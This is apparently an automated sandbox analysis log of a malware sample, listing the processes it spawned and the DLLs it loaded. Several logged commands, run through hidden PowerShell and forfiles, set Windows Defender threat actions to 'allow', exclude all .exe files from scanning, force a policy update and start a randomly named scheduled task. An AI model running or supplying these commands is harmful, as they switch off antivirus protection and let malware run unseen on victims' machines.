Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C schtasks /run /I /tn biPxHmULFllsbMgnpt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn biPxHmULFllsbMgnpt
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
